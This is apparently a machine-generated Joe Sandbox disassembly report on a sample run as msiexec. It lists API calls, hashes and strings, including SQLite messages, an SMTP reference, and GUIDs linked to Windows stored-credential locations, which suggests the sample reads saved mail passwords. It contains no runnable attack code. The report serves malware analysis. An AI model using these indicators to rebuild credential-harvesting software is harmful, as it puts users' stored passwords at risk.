                                                                                                              • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                            • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                              • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                              • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                            • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                            • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                            • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2374668499-0
                                                                                                            • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                            • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                            • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                            • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                            • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                            • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                            • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                            APIs
                                                                                                              • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                              • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                              • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                            • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                            • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2775283111-0
                                                                                                            • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                            • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                            • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                            • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                            • API String ID: 885266447-2471937615
                                                                                                            • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                            • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                            • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                            • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                            APIs
                                                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strcmpi$_mbscpy
                                                                                                            • String ID: smtp
                                                                                                            • API String ID: 2625860049-60245459
                                                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040C28C
                                                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FocusMessagePostmemset
                                                                                                            • String ID: S_@$l
                                                                                                            • API String ID: 3436799508-4018740455
                                                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004092C0
                                                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                            Strings
                                                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                            • API String ID: 408644273-3424043681
                                                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy
                                                                                                            • String ID: C^@$X$ini
                                                                                                            • API String ID: 714388716-917056472
                                                                                                            • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                            • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                            • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                            • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                            • String ID: MS Sans Serif
                                                                                                            • API String ID: 3492281209-168460110
                                                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName_strcmpimemset
                                                                                                            • String ID: edit
                                                                                                            • API String ID: 275601554-2167791130
                                                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strlen$_mbscat
                                                                                                            • String ID: 3CD
                                                                                                            • API String ID: 3951308622-1938365332
                                                                                                            • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                            • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                            • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                            • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: rows deleted
                                                                                                            • API String ID: 2221118986-571615504
                                                                                                            • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                            • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                            • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                            • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1860491036-0
                                                                                                            • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                            • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004048C2
                                                                                                            • memset.MSVCRT ref: 004048D6
                                                                                                            • memset.MSVCRT ref: 004048EA
                                                                                                            • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                            • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 368790112-0
                                                                                                            • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                            • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                            • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                            • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040D2C2
                                                                                                            • memset.MSVCRT ref: 0040D2D8
                                                                                                            • memset.MSVCRT ref: 0040D2EA
                                                                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                            • memset.MSVCRT ref: 0040D319
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 368790112-0
                                                                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00425850
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                            • __allrem.LIBCMT ref: 00425933
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                            • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                            • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                            • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • too many SQL variables, xrefs: 0042C6FD
                                                                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                            • API String ID: 2221118986-515162456
                                                                                                            • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                            • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                            • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                            • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                            APIs
                                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                            • memset.MSVCRT ref: 004026AD
                                                                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                              • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                              • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                            • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3503910906-0
                                                                                                            • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                            • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                            • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                            • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040C922
                                                                                                            • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                            • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                            • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$MenuPostSendStringmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3798638045-0
                                                                                                            • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                            • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                            • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                            • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                            • strlen.MSVCRT ref: 0040B60B
                                                                                                            • atoi.MSVCRT(?), ref: 0040B619
                                                                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4107816708-0
                                                                                                            • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                            • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                            • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                            • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                            • _gmtime64.MSVCRT ref: 00411437
                                                                                                            • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                            • strftime.MSVCRT ref: 00411476
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886415126-0
                                                                                                            • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                            • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                            • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                            • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strlen
                                                                                                            • String ID: >$>$>
                                                                                                            • API String ID: 39653677-3911187716
                                                                                                            • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                            • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                            • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                            • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
